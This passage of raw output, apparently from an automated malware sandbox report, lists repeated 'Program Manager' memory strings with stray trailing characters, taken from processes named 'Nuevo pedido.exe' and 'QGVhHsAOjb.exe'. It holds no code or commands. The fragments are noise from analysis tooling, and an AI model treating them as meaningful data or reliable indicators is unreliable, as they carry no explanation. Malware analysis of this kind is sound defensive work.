                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qhFG
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpuq
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q07K
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qH%`
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4_n
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`Uf
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`5H
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qhep
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt]^
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q</0
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qx%$
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qT=c
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD=s
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,f3
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qx[>
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTtX
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@LB
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`*L
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q n?
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8~6
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qtSB
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlC;
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0+F
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd1u
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd2<
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxZR
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4V$
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qH\U
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q44?
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qp(l
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt0p
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qq/
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlBO
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|#!
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD3h
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<g#
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qdtm
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<E>
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpW
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$wG
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTSs
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|"F
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd41
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qx|e
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qx<)
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0o,
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qH]A
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(>!
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<DR
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@N7
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerx
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL#]
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX\j
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpg
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0O
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@MK
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|!Z
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX;`
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDun
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd0G
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxX]
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q| #
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$u$
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8{U
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt0A
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^ql@Z
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qxyg
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt0C
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt0D
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\aO
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qhz>
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDrs
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd/[
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX8b
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q41^
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\b;
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8|A
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qqq
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`)C
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<B]
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qH{j
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh|3
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0w
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(:e
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q n
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTS1
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL"&
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd1P
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHZ`
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q42J
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\d0
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4Rh
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0Kd
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q Kt
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`(W
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPk_
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlad
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\at
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$U4
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlAF
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<CI
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt8
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<cg
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh[)
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qH;.
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`Ia
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0m7
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<iF
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qdWM
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP/7
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpp<
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\%g
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qdX9
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<hZ
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP.K
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(@D
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTVn
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qx`1
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(`b
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q 1:
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8?m
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX?J
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@qS
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q)_
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q 0N
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh=j
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qJi
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlJ
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q${1
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|Eb
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlEr
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qli8
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL(3
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4Z<
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q+T
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(AM
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpqE
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,'j
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX@6
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@r?
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,<
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4YP
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlh
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD8[
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qmE
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlhL
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlH.
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<jO
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(B9
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q49D
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt6X
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDXp
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qppY
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0,t
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(^m
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTw9
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpm[
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q464
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLDg
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qdUX
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTvM
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|#O
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\dr
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<G3
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$y<
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP-B
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qN%
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0O?
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<&)
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qH_6
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlE0
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$xP
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP,V
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL%R
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4W[
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q /E
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlfW
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q Oc
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX=U
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt4c
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd4s
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@o^
